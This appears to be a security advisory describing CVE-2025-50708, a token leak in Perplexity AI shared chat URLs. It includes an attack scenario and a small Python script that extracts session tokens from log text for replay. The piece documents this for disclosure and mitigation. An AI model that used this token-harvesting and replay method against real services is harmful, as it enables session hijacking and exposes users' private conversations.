Sensitive Information Disclosure in Perplexity AI GPT-4 (v2.51.0)
Overview
A critical vulnerability, CVE-2025-50708, has been identified in Perplexity AI GPT-4 version 2.51.0, allowing remote attackers to obtain sensitive information via the token component in shared chat URLs. This flaw exposes confidential data, including session tokens, user identifiers, or other authentication-related details embedded in shared links.
The vulnerability was publicly disclosed on July 18, 2025, and affects users who share chat session URLs containing embedded tokens. Attackers could exploit this issue to hijack sessions, impersonate users, or gain unauthorized access to private conversations.
Technical Details
Root Cause
The vulnerability arises due to insufficient sanitization of shared chat URLs. When a user generates a shareable link, the system embeds a session token or other sensitive metadata in the URL. Since URLs are often logged in:
- Web server logs
- Browser history
- Proxy/cache systems
- Third-party analytics services
An attacker with access to these logs could extract the token and use it to impersonate the victim.
Attack Scenario
- Victim shares a Perplexity AI chat session (e.g.,
https://perplexity.ai/share/chat?token=ABC123XYZ
). - URL is logged in an intermediate system (e.g., corporate proxy, email server, or analytics tracker).
- Attacker retrieves the token from logs or intercepted traffic.
- Attacker loads the URL, gaining access to the victim’s chat session without authentication.
Proof of Concept (PoC)
A simple Python script simulating token extraction from a log file:
import re
# Sample log file containing shared Perplexity AI URLs
log_data = """
[18/Jul/2025] User shared: https://perplexity.ai/share/chat?token=ABC123XYZ
[18/Jul/2025] User shared: https://perplexity.ai/share/chat?token=DEF456UVW
"""
# Extract tokens using regex
tokens = re.findall(r'token=([A-Za-z0-9]+)', log_data)
print("Extracted tokens:", tokens)
# Output: ['ABC123XYZ', 'DEF456UVW']
An attacker could then use these tokens to impersonate users.
Impact
- Session Hijacking: Attackers can take over active sessions.
- Unauthorized Data Access: Exposure of private chat logs.
- Phishing & Social Engineering: Stolen tokens could be used in targeted attacks.
Mitigation & Fixes
Perplexity AI has released a patch in a subsequent version. Users should:
- Upgrade to the latest version of Perplexity AI GPT-4.
- Avoid sharing sensitive chat links via insecure channels.
- Implement short-lived tokens that expire after use.
Developers should:
- Remove tokens from URLs and use secure session management.
- Use HTTP-only, Secure, and SameSite cookies for session handling.
- Audit logging mechanisms to prevent token leakage.
Conclusion
CVE-2025-50708 highlights the risks of embedding sensitive data in URLs. Organizations must ensure proper token handling and adopt secure sharing mechanisms. Users should remain cautious when sharing AI-generated chat links and verify that they are using patched software versions.
For further updates, refer to Perplexity AI’s security advisory or the CVE database (MITRE).